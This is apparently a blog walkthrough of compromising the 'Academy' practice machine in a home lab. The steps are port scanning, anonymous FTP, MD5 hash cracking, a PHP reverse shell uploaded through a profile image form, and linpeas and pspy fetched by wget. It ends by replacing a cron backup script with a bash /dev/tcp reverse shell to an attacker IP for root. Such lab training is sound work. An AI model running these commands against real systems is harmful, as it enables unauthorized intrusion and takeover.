EXPLOITING ACADEMY MACHINE WITH PRIVILEDGE ESCALATION
Babs
Posted on June 6, 2024
In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll simulate a scenario where we have low-level access to a system and attempt to gain higher privileges. This process will be conducted ethically on a dedicated training machine to understand attacker methodologies and bolster our system defence knowledge.
After successfully setting up your academy machine, use the following details to login to the machine.
Username: root
Password: tcm
Now we need to get the IP address of the academy machine, to get that input the command:
dhclient
after that input the command:
ip a
From the above image, my IP address for academy is 192.168.59.134
Now we can ping the machine to confirm that both our academy and kali machine are alive and communicating.
For that we use the command:
ping 192.168.59.134 -c2
NB- your IP address would be different from mine so make sure to note your IP address and ping it.
The image above shows both machines can communicate as no packets were lost.
Next we run NMAP scan to search for open ports using the command:
nmap -p- -A 192.168.59.134
From the above scan, 3 ports are open, port 21, 22 and 80.
Also note that I indicated note.txt seen on port 21, that's because I am interested in getting the txt file since it was shown to us from our scan.
NB- Moving forward, create an academy directory so you can store all files needed for this lab, so as not to have all files scattered around.
Port 21 is being used by an ftp server which allows anonymous login, so to login, we input the command:
ftp 192.168.59.134
NB- remember to change the IP address
After entering the command, input anonymous for both username and password.
Once you have successfully logged in, input the command below to get the note.txt file.
get note.txt
That's all you need to do to get the file, the next thing to do now is to exit ftp and view the txt file, to exit ftp use the command:
exit
Once you have successfully exited ftp, now we need to view what is inside the note.txt file and for that we use the command:
cat note.txt
The file shows a message from jdelta, telling Heath about Grimme which contains a text about a student's record.
Here's what each data point likely represents:
StudentRegno: 10201321 (Likely a unique student identification number)
studentPhoto: '' (Empty, indicating no photo uploaded)
password: 'cd73502828457d15655bbd7a63fb0bc8' (This is a hashed password, not the original password for security reasons)
studentName: 'Rum Ham' (Student's name)
pincode: '777777' (Possibly a student identification code)
session: '' (Empty, might be session year or term)
department: '' (Empty)
semester: '' (Empty)
cgpa: '7.60' (Student's CGPA - likely Cumulative Grade Point Average)
creationdate: '2021-05-29 14:36:56' (Date and time the record was created)
updationDate: '' (Empty, might be filled when the record is updated)
Now that we have a likely username and password to login into a website which we currently have no idea what the website is.
The first thing we do is input the machine's IP address into a web browser.
Mine still remains 192.168.59.134, so that is what I input into my web browser.
That's the page it led me to and there's no space for login details, so there must be a login page attached to that IP address.
To find that we can use what is known as dirb-buster or ffuf
For this lab I'd make use of FFUF using the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.134/FUZZ
The above command will search for web directories associated with that IP address.
It found two web directories which are academy and phpmyadmin
Now, we go to our web-browser and input:
192.168.59.134/academy
NB- remember to change the IP address to yours
I have successfully found the login page and from the note.txt file I was given the details to use for the login which are:
StudentRegno: 10201321
password: cd73502828457d15655bbd7a63fb0bc8
The details shows invalid because the password given is not an actual password, it was actually the password hash, which means we need to crack the hash to find out what the actual password is.
To crack the hash, we need to create a file and save the password hash into the file.
To create the password file we'd use nano , so input the command:
nano hashes.txt
Paste the hash in the terminal
Now press ctrl x on your keyboard to save
Now press Y on your keyboard to save
The below command will change like the image seen below, press the enter key on your keyboard to save the file.
Now the hash as been saved as a file named hashes.txt.
To crack the hash we first need to identify what type of hash it is, and we do that using the command:
hash-identifier
and now we paste the hash
From the image above the hash is said to be an md5 hash.
knowing that we press ctrl c to quit the hash-identifier and input the command:
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
It will reveal the real password to us.
If you have cracked the password before and couldn't see the password, input the command:
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
The password would reveal itself.
We can also use another method to crack the hash if we do not want to use hashcat.
To crack the hash, visit "https://crackstation.net/" on your web browser and input the hash in the box provided and click on crack hashes.
The hashed password was revealed to be student.
Now we can login with the details:
StudentRegno: 10201321
password: student
Login successful!
NB- There's no need to change the password, just click on "my profile" on the web page.
We can see from the web-browser that the website is making use of PHP programming language.
We can also see that there's a place to upload image which is empty, the plan now is to see if we can upload something other than an image in there.
What we plan on uploading is a script which is a reverse shell so as to give us a connection here.
From here, go to google and search for "php reverse shell"
Click on the one from pentestmonkey github
Click on php-reverse-shell.php
Click on Raw
Now copy everything by pressing the ctrl A and ctrl C on your keyboard and save it as a file named shell.php.
To save the file, input the command:
nano shell.php
Now paste all that you have copied.
NB- Scroll down and find where you can see CHANGE THIS
Change the IP address to your attacking machine's IP address (not the academy IP address)
You can leave the port number as it is as 1234.
Once that has been changed, save the file.
Now input the command:
nc -nvlp 1234
once you've inputted that command, what you need to do is upload the shell.php file where the upload image is and click on update, to make sure the changes has saved.
No image will be displayed but you would have gotten a shell on your listener.
The image above shows the listener before the image upload
The image above shows the listener after the image upload.
We have successfully popped a shell.
To find out who we are on the machine, we input the command:
whoami
We are a low level user known as www-data, so our job here is not done because we do not have super user privilege, so we need to find a way to escalate the user to a super user like an admin or root.
To do that we are going to use a tool called "linpeas"
Linpeas is an automation tool that helps us in searching for any sort of privilege escalation.
To use linpeas visit the website "https://linpeas.sh/"
Now we need to copy everything seen on the linpeas page and save it in a file.
To do that we use "ctrl A" to mark all and "ctrl C" to copy.
Then we need to open a new tab on our kali and use nano to paste what we copied and save it.
To save my linpeas file I created a new directory called "transfer" and saved the linpeas there.
NB- you can choose to create a new directory if you wish, or just save the file in your current directory.
To save the linpeas file we copied from the webpage, we input the command:
nano linpeas.sh
and then we paste the copied text and save the file.
The file has been saved on our local device, so now we need to find a way to send the linpeas.sh file into the remote shell we accessed in which we are the www-data user.
To do that we need to host a web-server in the directory where the linpeas file was saved and use wget to get the file.
So on the tab where the linpeas file is saved, input the command:
python3 -m http.server 80
Now move back to the www-data user tab and cd into the tmp folder using the command:
cd tmp
so as to have the file saved in the tmp folder, now we input the command below to get the linpeas file:
wget http://192.168.59.131/linpeas.sh
Now we need to make the file executable and we do that by using the command:
chmod +x linpeas.sh
and now we run the linpeas file using the command:
./linpeas.sh
There are lots of things to scroll through after running the above command, but for us what stands out and calls for our attention is a file that it shows us and also a password as shown in the image below
From the image above we can spot this:
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
The /var/www/html/academy/includes/ is a directory and config.php is a file, so to check the content of the file we input the command:
cat /var/www/html/academy/includes/config.php
and we get the following response as shown in the image below:
The image above is showing us that there's a sql user named grimmie with a password of My_V3ryS3cur3_P4ss
So now we open a new tab and try login into the machine as grimmie using ssh with the command:
ssh grimmie@192.168.59.134
If it asks you about a fingerprint input the command yes
For the password input:
My_V3ryS3cur3_P4ss
we have successfully logged in as grimmie.
According to the command cat
grimmie is an administrator on the machine.
/etc/passwd
Grimmie is an administrator but yet we still do not have sudo(super user) privilege after inputting the command:
sudo -l
So our work here isn't done.
After inputting the command
ls
and
cat backup.sh
What we can see is that there's a script running periodic backup and after seeing that we would like to know the time it takes for the backup to occur because we plan on editing the script to run a particular command for us, so we need to know if the backup is running per hour, per day, per week or whatever time it takes to run.
First we input the command:
crontab -l
From the results gotten, grimmie does not have access to crontab, if grimmie had access to crontab we would have been able to edit how frequently the backup should be taking place, because we plan on running a script as soon as possible and would not like to wait till a particular day or week before the script can be executed.
Also we can use the command:
systemctl list-timers
to see if there's any script running on a timer but from the output gotten we cannot find any.
When we have a situation like this we can use a tool called pspy.
Pspy is a tool that would give us more information about what processes are running than what our devices has been showing us so far.
To download pspy, we search google for pspy and select the one seen from the image below.
Scroll down and download the 64 bit pspy
The pspy64 should be located in your download folder on kali, locate your download folder and find the pspy64 and host a webserver in the directory that contains the pspy64 and use wget on grimmie's tab to get the pspy64.
After locating the directory that contains the pspy64 (which should be your downloads folder), input the command in that directory:
python3 -m http.server 80
and on grimmie's tab, you can move into the tmp folder using the command cd
so as to store the file in the tmp folder and input the command:
/tmp
wget http://192.168.59.131/pspy64
Now that the pspy64 file has been downloaded, we need to make it executable by using the command:
chmod +x pspy64
Now we execute the file using the command:
./pspy64
After a while we can see that the backup.sh file is actually running in the background
The backup is actually programmed to run every minute, which is good news for us, now we can move on to editing the backup script.
The image above is a confirmation of the time it takes for the backup script to run.
Now we need to go back to our directory that has the backup file.
To do that we input the command:
cd /home/grimmie
Now we go to google and search for bash reverse shell one liner
Select the one from pentestmonkey as shown below
The image below shows the bash we need, it is a one line reverse shell script.
Now copy the script which is:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
and change the 10.0.0.1 to your attacker/local machine, remember mine is 192.168.59.131, so mine would look like this:
bash -i >& /dev/tcp/192.168.59.131/8080 0>&1
First we need to set up a listener and to set that up, we open a new tab and use the command:
nc -nvlp 8080
After setting up the listener we need to edit the backup.sh script to our bash one liner script.
To do that we go back to our grimmie tab and input the command:
nano backup.sh
`
Clear the backup script and input the one liner script just as shown in the image below.
and save the file.
Within a minute a root shell was gotten while while waiting for the file to execute.
Congratulations!
We have successfully rooted the machine.
Posted on June 6, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.
Related
November 29, 2024